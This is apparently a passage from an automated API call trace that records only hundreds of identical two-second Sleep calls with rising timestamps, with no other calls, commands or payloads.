Sleep (dwMilliseconds=0x7d0) [0222.298] Sleep (dwMilliseconds=0x7d0) [0222.307] Sleep (dwMilliseconds=0x7d0) [0222.309] Sleep (dwMilliseconds=0x7d0) [0222.317] Sleep (dwMilliseconds=0x7d0) [0222.322] Sleep (dwMilliseconds=0x7d0) [0222.326] Sleep (dwMilliseconds=0x7d0) [0222.335] Sleep (dwMilliseconds=0x7d0) [0222.336] Sleep (dwMilliseconds=0x7d0) [0222.351] Sleep (dwMilliseconds=0x7d0) [0222.353] Sleep (dwMilliseconds=0x7d0) [0222.359] Sleep (dwMilliseconds=0x7d0) [0222.361] Sleep (dwMilliseconds=0x7d0) [0222.367] Sleep (dwMilliseconds=0x7d0) [0222.368] Sleep (dwMilliseconds=0x7d0) [0222.374] Sleep (dwMilliseconds=0x7d0) [0222.375] Sleep (dwMilliseconds=0x7d0) [0222.382] Sleep (dwMilliseconds=0x7d0) [0222.390] Sleep (dwMilliseconds=0x7d0) [0222.397] Sleep (dwMilliseconds=0x7d0) [0222.405] Sleep (dwMilliseconds=0x7d0) [0222.412] Sleep (dwMilliseconds=0x7d0) [0222.417] Sleep (dwMilliseconds=0x7d0) [0222.419] Sleep (dwMilliseconds=0x7d0) [0222.421] Sleep (dwMilliseconds=0x7d0) [0222.426] Sleep (dwMilliseconds=0x7d0) [0222.433] Sleep (dwMilliseconds=0x7d0) [0222.435] Sleep (dwMilliseconds=0x7d0) [0222.440] Sleep (dwMilliseconds=0x7d0) [0222.446] Sleep (dwMilliseconds=0x7d0) [0222.455] Sleep (dwMilliseconds=0x7d0) [0222.462] Sleep (dwMilliseconds=0x7d0) [0222.489] Sleep (dwMilliseconds=0x7d0) [0222.491] Sleep (dwMilliseconds=0x7d0) [0222.499] Sleep (dwMilliseconds=0x7d0) [0222.500] Sleep (dwMilliseconds=0x7d0) [0222.504] Sleep (dwMilliseconds=0x7d0) [0222.509] Sleep (dwMilliseconds=0x7d0) [0222.510] Sleep (dwMilliseconds=0x7d0) [0222.518] Sleep (dwMilliseconds=0x7d0) [0222.520] Sleep (dwMilliseconds=0x7d0) [0222.526] Sleep (dwMilliseconds=0x7d0) [0222.528] Sleep (dwMilliseconds=0x7d0) [0222.533] Sleep (dwMilliseconds=0x7d0) [0222.535] Sleep (dwMilliseconds=0x7d0) [0222.543] Sleep (dwMilliseconds=0x7d0) [0222.545] Sleep (dwMilliseconds=0x7d0) [0222.548] Sleep (dwMilliseconds=0x7d0) [0222.552] Sleep (dwMilliseconds=0x7d0) [0222.555] Sleep (dwMilliseconds=0x7d0) [0222.562] Sleep (dwMilliseconds=0x7d0) [0222.569] Sleep (dwMilliseconds=0x7d0) [0222.571] Sleep (dwMilliseconds=0x7d0) [0222.578] Sleep (dwMilliseconds=0x7d0) [0222.580] Sleep (dwMilliseconds=0x7d0) [0222.586] Sleep (dwMilliseconds=0x7d0) [0222.593] Sleep (dwMilliseconds=0x7d0) [0222.596] Sleep (dwMilliseconds=0x7d0) [0222.604] Sleep (dwMilliseconds=0x7d0) [0222.605] Sleep (dwMilliseconds=0x7d0) [0222.614] Sleep (dwMilliseconds=0x7d0) [0222.616] Sleep (dwMilliseconds=0x7d0) [0222.624] Sleep (dwMilliseconds=0x7d0) [0222.633] Sleep (dwMilliseconds=0x7d0) [0222.635] Sleep (dwMilliseconds=0x7d0) [0222.637] Sleep (dwMilliseconds=0x7d0) [0222.643] Sleep (dwMilliseconds=0x7d0) [0222.652] Sleep (dwMilliseconds=0x7d0) [0222.655] Sleep (dwMilliseconds=0x7d0) [0222.661] Sleep (dwMilliseconds=0x7d0) [0222.663] Sleep (dwMilliseconds=0x7d0) [0222.668] Sleep (dwMilliseconds=0x7d0) [0222.674] Sleep (dwMilliseconds=0x7d0) [0222.675] Sleep (dwMilliseconds=0x7d0) [0222.681] Sleep (dwMilliseconds=0x7d0) [0222.683] Sleep (dwMilliseconds=0x7d0) [0222.689] Sleep (dwMilliseconds=0x7d0) [0222.690] Sleep (dwMilliseconds=0x7d0) [0222.696] Sleep (dwMilliseconds=0x7d0) [0222.703] Sleep (dwMilliseconds=0x7d0) [0222.704] Sleep (dwMilliseconds=0x7d0) [0222.711] Sleep (dwMilliseconds=0x7d0) [0222.713] Sleep (dwMilliseconds=0x7d0) [0222.720] Sleep (dwMilliseconds=0x7d0) [0222.721] Sleep (dwMilliseconds=0x7d0) [0222.726] Sleep (dwMilliseconds=0x7d0) [0222.728] Sleep (dwMilliseconds=0x7d0) [0222.735] Sleep (dwMilliseconds=0x7d0) [0222.737] Sleep (dwMilliseconds=0x7d0) [0222.743] Sleep (dwMilliseconds=0x7d0) [0222.749] Sleep (dwMilliseconds=0x7d0) [0222.750] Sleep (dwMilliseconds=0x7d0) [0222.756] Sleep (dwMilliseconds=0x7d0) [0222.763] Sleep (dwMilliseconds=0x7d0) [0222.765] Sleep (dwMilliseconds=0x7d0) [0222.770] Sleep (dwMilliseconds=0x7d0) [0222.771] Sleep (dwMilliseconds=0x7d0) [0222.779] Sleep (dwMilliseconds=0x7d0) [0222.780] Sleep (dwMilliseconds=0x7d0) [0222.787] Sleep (dwMilliseconds=0x7d0) [0222.788] Sleep (dwMilliseconds=0x7d0) [0222.794] Sleep (dwMilliseconds=0x7d0) [0222.802] Sleep (dwMilliseconds=0x7d0) [0222.803] Sleep (dwMilliseconds=0x7d0) [0222.813] Sleep (dwMilliseconds=0x7d0) [0222.814] Sleep (dwMilliseconds=0x7d0) [0222.822] Sleep (dwMilliseconds=0x7d0) [0222.824] Sleep (dwMilliseconds=0x7d0) [0222.830] Sleep (dwMilliseconds=0x7d0) [0222.831] Sleep (dwMilliseconds=0x7d0) [0222.838] Sleep (dwMilliseconds=0x7d0) [0222.839] Sleep (dwMilliseconds=0x7d0) [0222.846] Sleep (dwMilliseconds=0x7d0) [0222.854] Sleep (dwMilliseconds=0x7d0) [0222.856] Sleep (dwMilliseconds=0x7d0) [0222.861] Sleep (dwMilliseconds=0x7d0) [0222.863] Sleep (dwMilliseconds=0x7d0) [0222.870] Sleep (dwMilliseconds=0x7d0) [0222.876] Sleep (dwMilliseconds=0x7d0) [0222.878] Sleep (dwMilliseconds=0x7d0) [0222.884] Sleep (dwMilliseconds=0x7d0) [0222.885] Sleep (dwMilliseconds=0x7d0) [0222.910] Sleep (dwMilliseconds=0x7d0) [0222.912] Sleep (dwMilliseconds=0x7d0) [0222.918] Sleep (dwMilliseconds=0x7d0) [0222.919] Sleep (dwMilliseconds=0x7d0) [0222.925] Sleep (dwMilliseconds=0x7d0) [0222.926] Sleep (dwMilliseconds=0x7d0) [0222.933] Sleep (dwMilliseconds=0x7d0) [0222.939] Sleep (dwMilliseconds=0x7d0) [0222.940] Sleep (dwMilliseconds=0x7d0) [0222.946] Sleep (dwMilliseconds=0x7d0) [0222.947] Sleep (dwMilliseconds=0x7d0) [0222.952] Sleep (dwMilliseconds=0x7d0) [0222.954] Sleep (dwMilliseconds=0x7d0) [0222.960] Sleep (dwMilliseconds=0x7d0) [0222.967] Sleep (dwMilliseconds=0x7d0) [0222.968] Sleep (dwMilliseconds=0x7d0) [0222.970] Sleep (dwMilliseconds=0x7d0) [0222.975] Sleep (dwMilliseconds=0x7d0) [0222.977] Sleep (dwMilliseconds=0x7d0) [0222.982] Sleep (dwMilliseconds=0x7d0) [0222.989] Sleep (dwMilliseconds=0x7d0) [0222.991] Sleep (dwMilliseconds=0x7d0) [0222.997] Sleep (dwMilliseconds=0x7d0) [0223.003] Sleep (dwMilliseconds=0x7d0) [0223.004] Sleep (dwMilliseconds=0x7d0) [0223.010] Sleep (dwMilliseconds=0x7d0) [0223.011] Sleep (dwMilliseconds=0x7d0) [0223.014] Sleep (dwMilliseconds=0x7d0) [0223.017] Sleep (dwMilliseconds=0x7d0) [0223.023] Sleep (dwMilliseconds=0x7d0) [0223.030] Sleep (dwMilliseconds=0x7d0) [0223.031] Sleep (dwMilliseconds=0x7d0) [0223.037] Sleep (dwMilliseconds=0x7d0) [0223.039] Sleep (dwMilliseconds=0x7d0) [0223.044] Sleep (dwMilliseconds=0x7d0) [0223.046] Sleep (dwMilliseconds=0x7d0) [0223.051] Sleep (dwMilliseconds=0x7d0) [0223.053] Sleep (dwMilliseconds=0x7d0) [0223.058] Sleep (dwMilliseconds=0x7d0) [0223.060] Sleep (dwMilliseconds=0x7d0) [0223.067] Sleep (dwMilliseconds=0x7d0) [0223.068] Sleep (dwMilliseconds=0x7d0) [0223.073] Sleep (dwMilliseconds=0x7d0) [0223.080] Sleep (dwMilliseconds=0x7d0) [0223.082] Sleep (dwMilliseconds=0x7d0) [0223.087] Sleep (dwMilliseconds=0x7d0) [0223.093] Sleep (dwMilliseconds=0x7d0) [0223.101] Sleep (dwMilliseconds=0x7d0) [0223.102] Sleep (dwMilliseconds=0x7d0) [0223.108] Sleep (dwMilliseconds=0x7d0) [0223.109] Sleep (dwMilliseconds=0x7d0) [0223.115] Sleep (dwMilliseconds=0x7d0) [0223.116] Sleep (dwMilliseconds=0x7d0) [0223.122] Sleep (dwMilliseconds=0x7d0) [0223.139] Sleep (dwMilliseconds=0x7d0) [0223.149] Sleep (dwMilliseconds=0x7d0) [0223.150] Sleep (dwMilliseconds=0x7d0) [0223.158] Sleep (dwMilliseconds=0x7d0) [0223.161] Sleep (dwMilliseconds=0x7d0) [0223.165] Sleep (dwMilliseconds=0x7d0) [0223.172] Sleep (dwMilliseconds=0x7d0) [0223.179] Sleep (dwMilliseconds=0x7d0) [0223.180] Sleep (dwMilliseconds=0x7d0) [0223.186] Sleep (dwMilliseconds=0x7d0) [0223.193] Sleep (dwMilliseconds=0x7d0) [0223.194] Sleep (dwMilliseconds=0x7d0) [0223.200] Sleep (dwMilliseconds=0x7d0) [0223.206] Sleep (dwMilliseconds=0x7d0) [0223.207] Sleep (dwMilliseconds=0x7d0) [0223.213] Sleep (dwMilliseconds=0x7d0) [0223.214] Sleep (dwMilliseconds=0x7d0) [0223.220] Sleep (dwMilliseconds=0x7d0) [0223.221] Sleep (dwMilliseconds=0x7d0) [0223.227] Sleep (dwMilliseconds=0x7d0) [0223.228] Sleep (dwMilliseconds=0x7d0) [0223.234] Sleep (dwMilliseconds=0x7d0) [0223.235] Sleep (dwMilliseconds=0x7d0) [0223.241] Sleep (dwMilliseconds=0x7d0) [0223.242] Sleep (dwMilliseconds=0x7d0) [0223.248] Sleep (dwMilliseconds=0x7d0) [0223.251] Sleep (dwMilliseconds=0x7d0) [0223.255] Sleep (dwMilliseconds=0x7d0) [0223.263] Sleep (dwMilliseconds=0x7d0) [0223.264] Sleep (dwMilliseconds=0x7d0) [0223.270] Sleep (dwMilliseconds=0x7d0) [0223.276] Sleep (dwMilliseconds=0x7d0) [0223.277] Sleep (dwMilliseconds=0x7d0) [0223.283] Sleep (dwMilliseconds=0x7d0) [0223.285] Sleep (dwMilliseconds=0x7d0) [0223.292] Sleep (dwMilliseconds=0x7d0) [0223.294] Sleep (dwMilliseconds=0x7d0) [0223.299] Sleep (dwMilliseconds=0x7d0) [0223.301] Sleep (dwMilliseconds=0x7d0) [0223.306] Sleep (dwMilliseconds=0x7d0) [0223.308] Sleep (dwMilliseconds=0x7d0) [0223.313] Sleep (dwMilliseconds=0x7d0) [0223.315] Sleep (dwMilliseconds=0x7d0) [0223.322] Sleep (dwMilliseconds=0x7d0) [0223.324] Sleep (dwMilliseconds=0x7d0) [0223.329] Sleep (dwMilliseconds=0x7d0) [0223.331] Sleep (dwMilliseconds=0x7d0) [0223.338] Sleep (dwMilliseconds=0x7d0) [0223.352] Sleep (dwMilliseconds=0x7d0) [0223.354] Sleep (dwMilliseconds=0x7d0) [0223.361] Sleep (dwMilliseconds=0x7d0) [0223.363] Sleep (dwMilliseconds=0x7d0) [0223.369] Sleep (dwMilliseconds=0x7d0) [0223.370] Sleep (dwMilliseconds=0x7d0) [0223.382] Sleep (dwMilliseconds=0x7d0) [0223.389] Sleep (dwMilliseconds=0x7d0) [0223.391] Sleep (dwMilliseconds=0x7d0) [0223.396] Sleep (dwMilliseconds=0x7d0) [0223.398] Sleep (dwMilliseconds=0x7d0) [0223.403] Sleep (dwMilliseconds=0x7d0) [0223.405] Sleep (dwMilliseconds=0x7d0) [0223.410] Sleep (dwMilliseconds=0x7d0) [0223.412] Sleep (dwMilliseconds=0x7d0) [0223.417] Sleep (dwMilliseconds=0x7d0) [0223.423] Sleep (dwMilliseconds=0x7d0) [0223.430] Sleep (dwMilliseconds=0x7d0) [0223.432] Sleep (dwMilliseconds=0x7d0) [0223.435] Sleep (dwMilliseconds=0x7d0) [0223.437] Sleep (dwMilliseconds=0x7d0) [0223.439] Sleep (dwMilliseconds=0x7d0) [0223.445] Sleep (dwMilliseconds=0x7d0) [0223.446] Sleep (dwMilliseconds=0x7d0) [0223.453] Sleep (dwMilliseconds=0x7d0) [0223.454] Sleep (dwMilliseconds=0x7d0) [0223.462] Sleep (dwMilliseconds=0x7d0) [0223.468] Sleep (dwMilliseconds=0x7d0) [0223.475] Sleep (dwMilliseconds=0x7d0) [0223.476] Sleep (dwMilliseconds=0x7d0) [0223.481] Sleep (dwMilliseconds=0x7d0) [0223.483] Sleep (dwMilliseconds=0x7d0) [0223.489] Sleep (dwMilliseconds=0x7d0) [0223.490] Sleep (dwMilliseconds=0x7d0) [0223.495] Sleep (dwMilliseconds=0x7d0) [0223.497] Sleep (dwMilliseconds=0x7d0) [0223.502] Sleep (dwMilliseconds=0x7d0) [0223.504] Sleep (dwMilliseconds=0x7d0) [0223.509] Sleep (dwMilliseconds=0x7d0) [0223.511] Sleep (dwMilliseconds=0x7d0) [0223.516] Sleep (dwMilliseconds=0x7d0) [0223.519] Sleep (dwMilliseconds=0x7d0) [0223.528] Sleep (dwMilliseconds=0x7d0) [0223.529] Sleep (dwMilliseconds=0x7d0) [0223.535] Sleep (dwMilliseconds=0x7d0) [0223.537] Sleep (dwMilliseconds=0x7d0) [0223.543] Sleep (dwMilliseconds=0x7d0) [0223.544] Sleep (dwMilliseconds=0x7d0) [0223.549] Sleep (dwMilliseconds=0x7d0) [0223.556] Sleep (dwMilliseconds=0x7d0) [0223.564] Sleep (dwMilliseconds=0x7d0) [0223.566] Sleep (dwMilliseconds=0x7d0) [0223.576] Sleep (dwMilliseconds=0x7d0) [0223.577] Sleep (dwMilliseconds=0x7d0) [0223.579] Sleep (dwMilliseconds=0x7d0) [0223.583] Sleep (dwMilliseconds=0x7d0) [0223.585] Sleep (dwMilliseconds=0x7d0) [0223.591] Sleep (dwMilliseconds=0x7d0) [0223.592] Sleep (dwMilliseconds=0x7d0) [0223.599] Sleep (dwMilliseconds=0x7d0) [0223.608] Sleep (dwMilliseconds=0x7d0) [0223.615] Sleep (dwMilliseconds=0x7d0) [0223.617] Sleep (dwMilliseconds=0x7d0) [0223.623] Sleep (dwMilliseconds=0x7d0) [0223.624] Sleep (dwMilliseconds=0x7d0) [0223.630] Sleep (dwMilliseconds=0x7d0) [0223.632] Sleep (dwMilliseconds=0x7d0) [0223.639] Sleep (dwMilliseconds=0x7d0) [0223.648] Sleep (dwMilliseconds=0x7d0) [0223.656] Sleep (dwMilliseconds=0x7d0) [0223.657] Sleep (dwMilliseconds=0x7d0) [0223.665] Sleep (dwMilliseconds=0x7d0) [0223.666] Sleep (dwMilliseconds=0x7d0) [0223.668] Sleep (dwMilliseconds=0x7d0) [0223.676] Sleep (dwMilliseconds=0x7d0) [0223.677] Sleep (dwMilliseconds=0x7d0) [0223.683] Sleep (dwMilliseconds=0x7d0) [0223.684] Sleep (dwMilliseconds=0x7d0) [0223.690] Sleep (dwMilliseconds=0x7d0) [0223.692] Sleep (dwMilliseconds=0x7d0) [0223.698] Sleep (dwMilliseconds=0x7d0) [0223.709] Sleep (dwMilliseconds=0x7d0) [0223.710] Sleep (dwMilliseconds=0x7d0) [0223.712] Sleep (dwMilliseconds=0x7d0) [0223.718] Sleep (dwMilliseconds=0x7d0) [0223.720] Sleep (dwMilliseconds=0x7d0) [0223.727] Sleep (dwMilliseconds=0x7d0) [0223.728] Sleep (dwMilliseconds=0x7d0) [0223.736] Sleep (dwMilliseconds=0x7d0) [0223.737] Sleep (dwMilliseconds=0x7d0) [0223.743] Sleep (dwMilliseconds=0x7d0) [0223.750] Sleep (dwMilliseconds=0x7d0) [0223.751] Sleep (dwMilliseconds=0x7d0) [0223.755] Sleep (dwMilliseconds=0x7d0) [0223.758] Sleep (dwMilliseconds=0x7d0) [0223.772] Sleep (dwMilliseconds=0x7d0) [0223.781] Sleep (dwMilliseconds=0x7d0) [0223.782] Sleep (dwMilliseconds=0x7d0) [0223.788] Sleep (dwMilliseconds=0x7d0) [0223.789] Sleep (dwMilliseconds=0x7d0) [0223.795] Sleep (dwMilliseconds=0x7d0) [0223.796] Sleep (dwMilliseconds=0x7d0) [0223.802] Sleep (dwMilliseconds=0x7d0) [0223.804] Sleep (dwMilliseconds=0x7d0) [0223.811] Sleep (dwMilliseconds=0x7d0) [0223.812] Sleep (dwMilliseconds=0x7d0) [0223.818] Sleep (dwMilliseconds=0x7d0) [0223.830] Sleep (dwMilliseconds=0x7d0) [0223.831] Sleep (dwMilliseconds=0x7d0) [0223.838] Sleep (dwMilliseconds=0x7d0) [0223.839] Sleep (dwMilliseconds=0x7d0) [0223.847] Sleep (dwMilliseconds=0x7d0) [0223.851] Sleep (dwMilliseconds=0x7d0) [0223.854] Sleep (dwMilliseconds=0x7d0) [0223.855] Sleep (dwMilliseconds=0x7d0) [0223.861] Sleep (dwMilliseconds=0x7d0) [0223.870] Sleep (dwMilliseconds=0x7d0) [0223.872] Sleep (dwMilliseconds=0x7d0) [0223.880] Sleep (dwMilliseconds=0x7d0) [0223.905] Sleep (dwMilliseconds=0x7d0) [0223.906] Sleep (dwMilliseconds=0x7d0) [0223.913] Sleep (dwMilliseconds=0x7d0) [0223.916] Sleep (dwMilliseconds=0x7d0) [0223.917] Sleep (dwMilliseconds=0x7d0) [0223.922] Sleep (dwMilliseconds=0x7d0) [0223.932] Sleep (dwMilliseconds=0x7d0) [0223.933] Sleep (dwMilliseconds=0x7d0) [0223.940] Sleep (dwMilliseconds=0x7d0) [0223.941] Sleep (dwMilliseconds=0x7d0) [0223.948] Sleep (dwMilliseconds=0x7d0) [0223.954] Sleep (dwMilliseconds=0x7d0) [0223.963] Sleep (dwMilliseconds=0x7d0) [0223.970] Sleep (dwMilliseconds=0x7d0) [0223.976] Sleep (dwMilliseconds=0x7d0) [0223.977] Sleep (dwMilliseconds=0x7d0) [0223.986] Sleep (dwMilliseconds=0x7d0) [0223.996] Sleep (dwMilliseconds=0x7d0) [0223.997] Sleep (dwMilliseconds=0x7d0) [0224.003] Sleep (dwMilliseconds=0x7d0) [0224.004] Sleep (dwMilliseconds=0x7d0) [0224.007] Sleep (dwMilliseconds=0x7d0) [0224.010] Sleep (dwMilliseconds=0x7d0) [0224.017] Sleep (dwMilliseconds=0x7d0) [0224.019] Sleep (dwMilliseconds=0x7d0) [0224.027] Sleep (dwMilliseconds=0x7d0) [0224.036] Sleep (dwMilliseconds=0x7d0) [0224.037] Sleep (dwMilliseconds=0x7d0) [0224.045] Sleep (dwMilliseconds=0x7d0) [0224.051] Sleep (dwMilliseconds=0x7d0) [0224.054] Sleep (dwMilliseconds=0x7d0) [0224.055] Sleep (dwMilliseconds=0x7d0) [0224.063] Sleep (dwMilliseconds=0x7d0) [0224.064] Sleep (dwMilliseconds=0x7d0) [0224.073] Sleep (dwMilliseconds=0x7d0) [0224.082] Sleep (dwMilliseconds=0x7d0) [0224.084] Sleep (dwMilliseconds=0x7d0) [0224.091] Sleep (dwMilliseconds=0x7d0) [0224.092] Sleep (dwMilliseconds=0x7d0) [0224.097] Sleep (dwMilliseconds=0x7d0) [0224.101] Sleep (dwMilliseconds=0x7d0) [0224.109] Sleep (dwMilliseconds=0x7d0) [0224.111] Sleep (dwMilliseconds=0x7d0) [0224.118] Sleep (dwMilliseconds=0x7d0) [0224.120] Sleep (dwMilliseconds=0x7d0) [0224.127] Sleep (dwMilliseconds=0x7d0) [0224.136] Sleep (dwMilliseconds=0x7d0) [0224.137] Sleep (dwMilliseconds=0x7d0) [0224.140] Sleep (dwMilliseconds=0x7d0) [0224.145] Sleep (dwMilliseconds=0x7d0) [0224.147] Sleep (dwMilliseconds=0x7d0) [0224.154] Sleep (dwMilliseconds=0x7d0) [0224.155] Sleep (dwMilliseconds=0x7d0) [0224.162] Sleep (dwMilliseconds=0x7d0) [0224.172] Sleep (dwMilliseconds=0x7d0) [0224.180] Sleep (dwMilliseconds=0x7d0) [0224.181] Sleep (dwMilliseconds=0x7d0) [0224.184] Sleep (dwMilliseconds=0x7d0) [0224.190] Sleep (dwMilliseconds=0x7d0) [0224.191] Sleep (dwMilliseconds=0x7d0) [0224.199] Sleep (dwMilliseconds=0x7d0) [0224.207] Sleep (dwMilliseconds=0x7d0) [0224.208] Sleep (dwMilliseconds=0x7d0) [0224.214] Sleep (dwMilliseconds=0x7d0) [0224.216] Sleep (dwMilliseconds=0x7d0) [0224.221] Sleep (dwMilliseconds=0x7d0) [0224.222] Sleep (dwMilliseconds=0x7d0) [0224.227] Sleep (dwMilliseconds=0x7d0) [0224.229] Sleep (dwMilliseconds=0x7d0) [0224.235] Sleep (dwMilliseconds=0x7d0) [0224.236] Sleep (dwMilliseconds=0x7d0) [0224.242] Sleep (dwMilliseconds=0x7d0) [0224.248] Sleep (dwMilliseconds=0x7d0) [0224.249] Sleep (dwMilliseconds=0x7d0) [0224.255] Sleep (dwMilliseconds=0x7d0) [0224.256] Sleep (dwMilliseconds=0x7d0) [0224.262] Sleep (dwMilliseconds=0x7d0) [0224.263] Sleep (dwMilliseconds=0x7d0) [0224.269] Sleep (dwMilliseconds=0x7d0) [0224.270] Sleep (dwMilliseconds=0x7d0) [0224.276] Sleep (dwMilliseconds=0x7d0) [0224.280] Sleep (dwMilliseconds=0x7d0) [0224.281] Sleep (dwMilliseconds=0x7d0) [0224.287] Sleep (dwMilliseconds=0x7d0) [0224.288] Sleep (dwMilliseconds=0x7d0) [0224.294] Sleep (dwMilliseconds=0x7d0) [0224.300] Sleep (dwMilliseconds=0x7d0) [0224.307] Sleep (dwMilliseconds=0x7d0) [0224.313] Sleep (dwMilliseconds=0x7d0) [0224.314] Sleep (dwMilliseconds=0x7d0) [0224.320] Sleep (dwMilliseconds=0x7d0) [0224.321] Sleep (dwMilliseconds=0x7d0) [0224.327] Sleep (dwMilliseconds=0x7d0) [0224.329] Sleep (dwMilliseconds=0x7d0) [0224.335] Sleep (dwMilliseconds=0x7d0) [0224.350] Sleep (dwMilliseconds=0x7d0) [0224.351] Sleep (dwMilliseconds=0x7d0) [0224.358] Sleep (dwMilliseconds=0x7d0) [0224.365] Sleep (dwMilliseconds=0x7d0) [0224.366] Sleep (dwMilliseconds=0x7d0) [0224.371] Sleep (dwMilliseconds=0x7d0) [0224.380] Sleep (dwMilliseconds=0x7d0) [0224.381] Sleep (dwMilliseconds=0x7d0) [0224.387] Sleep (dwMilliseconds=0x7d0) [0224.388] Sleep (dwMilliseconds=0x7d0) [0224.395] Sleep (dwMilliseconds=0x7d0) [0224.396] Sleep (dwMilliseconds=0x7d0) [0224.402] Sleep (dwMilliseconds=0x7d0) [0224.403] Sleep (dwMilliseconds=0x7d0) [0224.409] Sleep (dwMilliseconds=0x7d0) [0224.410] Sleep (dwMilliseconds=0x7d0) [0224.418] Sleep (dwMilliseconds=0x7d0) [0224.420] Sleep (dwMilliseconds=0x7d0) [0224.424] Sleep (dwMilliseconds=0x7d0) [0224.426] Sleep (dwMilliseconds=0x7d0) [0224.432] Sleep (dwMilliseconds=0x7d0) [0224.433] Sleep (dwMilliseconds=0x7d0) [0224.439] Sleep (dwMilliseconds=0x7d0) [0224.446] Sleep (dwMilliseconds=0x7d0) [0224.453] Sleep (dwMilliseconds=0x7d0) [0224.460] Sleep (dwMilliseconds=0x7d0) [0224.461] Sleep (dwMilliseconds=0x7d0) [0224.466] Sleep (dwMilliseconds=0x7d0) [0224.468] Sleep (dwMilliseconds=0x7d0) [0224.469] Sleep (dwMilliseconds=0x7d0) [0224.475] Sleep (dwMilliseconds=0x7d0) [0224.483] Sleep (dwMilliseconds=0x7d0) [0224.484] Sleep (dwMilliseconds=0x7d0) [0224.491] Sleep (dwMilliseconds=0x7d0) [0224.492] Sleep (dwMilliseconds=0x7d0) [0224.498] Sleep (dwMilliseconds=0x7d0) [0224.499] Sleep (dwMilliseconds=0x7d0) [0224.504] Sleep (dwMilliseconds=0x7d0) [0224.510] Sleep (dwMilliseconds=0x7d0) [0224.512] Sleep (dwMilliseconds=0x7d0) [0224.513] Sleep (dwMilliseconds=0x7d0) [0224.519] Sleep (dwMilliseconds=0x7d0) [0224.526] Sleep (dwMilliseconds=0x7d0) [0224.528] Sleep (dwMilliseconds=0x7d0) [0224.533] Sleep (dwMilliseconds=0x7d0) [0224.534] Sleep (dwMilliseconds=0x7d0) [0224.540] Sleep (dwMilliseconds=0x7d0) [0224.547] Sleep (dwMilliseconds=0x7d0) [0224.553] Sleep (dwMilliseconds=0x7d0) [0224.555] Sleep (dwMilliseconds=0x7d0) [0224.561] Sleep (dwMilliseconds=0x7d0) [0224.563] Sleep (dwMilliseconds=0x7d0) [0224.568] Sleep (dwMilliseconds=0x7d0) [0224.570] Sleep (dwMilliseconds=0x7d0) [0224.577] Sleep (dwMilliseconds=0x7d0) [0224.583] Sleep (dwMilliseconds=0x7d0) [0224.584] Sleep (dwMilliseconds=0x7d0) [0224.590] Sleep (dwMilliseconds=0x7d0) [0224.596] Sleep (dwMilliseconds=0x7d0) [0224.598] Sleep (dwMilliseconds=0x7d0) [0224.600] Sleep (dwMilliseconds=0x7d0) [0224.604] Sleep (dwMilliseconds=0x7d0) [0224.611] Sleep (dwMilliseconds=0x7d0) [0224.612] Sleep (dwMilliseconds=0x7d0) [0224.619] Sleep (dwMilliseconds=0x7d0) [0224.624] Sleep (dwMilliseconds=0x7d0) [0224.626] Sleep (dwMilliseconds=0x7d0) [0224.631] Sleep (dwMilliseconds=0x7d0) [0224.632] Sleep (dwMilliseconds=0x7d0) [0224.640] Sleep (dwMilliseconds=0x7d0) [0224.644] Sleep (dwMilliseconds=0x7d0) [0224.648] Sleep (dwMilliseconds=0x7d0) [0224.649] Sleep (dwMilliseconds=0x7d0) [0224.655] Sleep (dwMilliseconds=0x7d0) [0224.657] Sleep (dwMilliseconds=0x7d0) [0224.663] Sleep (dwMilliseconds=0x7d0) [0224.669] Sleep (dwMilliseconds=0x7d0) [0224.678] Sleep (dwMilliseconds=0x7d0) [0224.685] Sleep (dwMilliseconds=0x7d0) [0224.692] Sleep (dwMilliseconds=0x7d0) [0224.693] Sleep (dwMilliseconds=0x7d0) [0224.701] Sleep (dwMilliseconds=0x7d0) [0224.708] Sleep (dwMilliseconds=0x7d0) [0224.709] Sleep (dwMilliseconds=0x7d0) [0224.716] Sleep (dwMilliseconds=0x7d0) [0224.717] Sleep (dwMilliseconds=0x7d0) [0224.722] Sleep (dwMilliseconds=0x7d0) [0224.724] Sleep (dwMilliseconds=0x7d0) [0224.730] Sleep (dwMilliseconds=0x7d0) [0224.731] Sleep (dwMilliseconds=0x7d0) [0224.736] Sleep (dwMilliseconds=0x7d0) [0224.738] Sleep (dwMilliseconds=0x7d0) [0224.744] Sleep (dwMilliseconds=0x7d0) [0224.746] Sleep (dwMilliseconds=0x7d0) [0224.751] Sleep (dwMilliseconds=0x7d0) [0224.757] Sleep (dwMilliseconds=0x7d0) [0224.759] Sleep (dwMilliseconds=0x7d0) [0224.764] Sleep (dwMilliseconds=0x7d0) [0224.765] Sleep (dwMilliseconds=0x7d0) [0224.771] Sleep (dwMilliseconds=0x7d0) [0224.772] Sleep (dwMilliseconds=0x7d0) [0224.779] Sleep (dwMilliseconds=0x7d0) [0224.781] Sleep (dwMilliseconds=0x7d0) [0224.787] Sleep (dwMilliseconds=0x7d0) [0224.793] Sleep (dwMilliseconds=0x7d0) [0224.795] Sleep (dwMilliseconds=0x7d0) [0224.802] Sleep (dwMilliseconds=0x7d0) [0224.803] Sleep (dwMilliseconds=0x7d0) [0224.809] Sleep (dwMilliseconds=0x7d0) [0224.815] Sleep (dwMilliseconds=0x7d0) [0224.817] Sleep (dwMilliseconds=0x7d0) [0224.824] Sleep (dwMilliseconds=0x7d0) [0224.825] Sleep (dwMilliseconds=0x7d0) [0224.827] Sleep (dwMilliseconds=0x7d0) [0224.831] Sleep (dwMilliseconds=0x7d0) [0224.832] Sleep (dwMilliseconds=0x7d0) [0224.839] Sleep (dwMilliseconds=0x7d0) [0224.846] Sleep (dwMilliseconds=0x7d0) [0224.847] Sleep (dwMilliseconds=0x7d0) [0224.853] Sleep (dwMilliseconds=0x7d0) [0224.854] Sleep (dwMilliseconds=0x7d0) [0224.859] Sleep (dwMilliseconds=0x7d0) [0224.861] Sleep (dwMilliseconds=0x7d0) [0224.867] Sleep (dwMilliseconds=0x7d0) [0224.868] Sleep (dwMilliseconds=0x7d0) [0224.871] Sleep (dwMilliseconds=0x7d0) [0224.873] Sleep (dwMilliseconds=0x7d0) [0224.875] Sleep (dwMilliseconds=0x7d0) [0224.881] Sleep (dwMilliseconds=0x7d0) [0224.904] Sleep (dwMilliseconds=0x7d0) [0224.911] Sleep (dwMilliseconds=0x7d0) [0224.918] Sleep (dwMilliseconds=0x7d0) [0224.920] Sleep (dwMilliseconds=0x7d0) [0224.937] Sleep (dwMilliseconds=0x7d0) [0224.938] Sleep (dwMilliseconds=0x7d0) [0224.945] Sleep (dwMilliseconds=0x7d0) [0224.948] Sleep (dwMilliseconds=0x7d0) [0224.949] Sleep (dwMilliseconds=0x7d0) [0224.954] Sleep (dwMilliseconds=0x7d0) 